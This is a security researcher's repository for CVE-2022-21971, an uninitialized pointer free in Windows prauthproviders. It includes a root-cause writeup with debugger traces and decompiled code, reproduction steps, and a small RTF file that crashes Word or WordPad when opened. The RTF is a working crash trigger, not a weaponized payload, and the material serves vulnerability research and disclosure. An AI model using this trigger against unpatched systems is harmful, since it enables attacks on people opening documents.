├── pics └── cve-2022-21971.gif ├── cve-2022-21971.rtf ├── LICENSE └── README.md /pics/cve-2022-21971.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0vercl0k/CVE-2022-21971/HEAD/pics/cve-2022-21971.gif -------------------------------------------------------------------------------- /cve-2022-21971.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1{\object\objocx{\*\objdata 2 | 01050000 3 | 02000000 4 | 1f000000 5 | 53656350726f7669646572732e574150584d4c53656350726f766964657200 6 | 00000000 7 | 00000000 8 | 01000000 9 | 41 10 | 01050000 11 | 00000000 12 | }}} 13 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Axel Souchet 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-21971: Uninitialized pointer free in prauthproviders 2 | 3 |

4 | 5 |

6 | 7 | ## Root-cause 8 | 9 | The `WapAuthProvider::CreateInstance` constructor allocates and initializes a `WapAuthProvider` object (0x78 bytes) but it fails to initialize completely its state. 10 | 11 | The pointer at offset 0x50 is uninitialized and free'd when the destructor is invoked (in `WapAuthProvider::~WapAuthProvider`): 12 | 13 | ``` 14 | prauthproviders!WapAuthProvider::~WapAuthProvider+0x38: 15 | 00007ffd`a91f3078 488b4b50 mov rcx,qword ptr [rbx+50h] ds:000001cf`efe35fd0=c0c0c0c0c0c0c0c0 16 | 17 | 0:011> 18 | prauthproviders!WapAuthProvider::~WapAuthProvider+0x3c: 19 | 00007ffd`a91f307c 4883634000 and qword ptr [rbx+40h],0 ds:000001cf`efe35fc0=0000000000000000 20 | 21 | 0:011> 22 | prauthproviders!WapAuthProvider::~WapAuthProvider+0x41: 23 | 00007ffd`a91f3081 48ff1578ad0000 call qword ptr [prauthproviders!_imp_LocalFree (00007ffd`a91fde00)] ds:00007ffd`a91fde00={KERNELBASE!LocalFree (00007ffd`ccdb0620) 24 | ``` 25 | 26 | This is the function using the uninitialized data, see `[0]` and `[1]`: 27 | 28 | ```c++ 29 | void WapAuthProvider::~WapAuthProvider(__int64 this) { 30 | void *v2; // rcx 31 | void *v3; // rcx 32 | 33 | *(_QWORD *)this = &WapAuthProvider::`vftable'; 34 | LocalFree(*(HLOCAL *)(this + 56)); 35 | v2 = *(void **)(this + 64); 36 | *(_QWORD *)(this + 56) = 0i64; 37 | LocalFree(v2); 38 | v3 = *(void **)(this + 80); // <-- [0] uninitialized 39 | *(_QWORD *)(this + 64) = 0i64; 40 | LocalFree(v3); // <-- [1] free 41 | *(_QWORD *)(this + 80) = 0i64; 42 | } 43 | ``` 44 | 45 | ## Repro 46 | 47 | 1. Turn on PageHeap via Gflags on `winword.exe` 48 | 1. Start Word, attach a debugger to it 49 | 1. Open `cve-2022-21971.rtf` in Word 50 | 51 | ``` 52 | (1c84.11b4): Access violation - code c0000005 (first chance) 53 | First chance exceptions are reported before any exception handling. 54 | This exception may be expected and handled. 55 | verifier!AVrfpDphFindBusyMemoryNoCheck+0x8a: 56 | 00007ffd`78d84742 817ac0bbbbcdab cmp dword ptr [rdx-40h],0ABCDBBBBh ds:c0c0c0c0`c0c0c080=???????? 57 | 58 | 0:011> kc 59 | # Call Site 60 | 00 verifier!AVrfpDphFindBusyMemoryNoCheck 61 | 01 verifier!AVrfpDphFindBusyMemory 62 | 02 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList 63 | 03 verifier!AVrfDebugPageHeapFree 64 | 04 ntdll!RtlDebugFreeHeap 65 | 05 ntdll!RtlpFreeHeap 66 | 06 ntdll!RtlpFreeHeapInternal 67 | 07 ntdll!RtlFreeHeap 68 | 08 KERNELBASE!LocalFree 69 | 09 prauthproviders!WapAuthProvider::~WapAuthProvider 70 | 0a prauthproviders!WapAuthProvider::`vector deleting destructor' 71 | 0b prauthproviders!WapAuthProvider::Release 72 | 0c prauthproviders!CClassFactory::CreateInstance 73 | 0d combase!CServerContextActivator::CreateInstance 74 | 0e combase!ActivationPropertiesIn::DelegateCreateInstance 75 | 0f combase!CApartmentActivator::CreateInstance 76 | ``` 77 | 78 | I've reproduced this on a Windows 10 x64 VM and on Windows 11 x64 with both Wordpad (but requires one click) and Office Word 2019. 79 | --------------------------------------------------------------------------------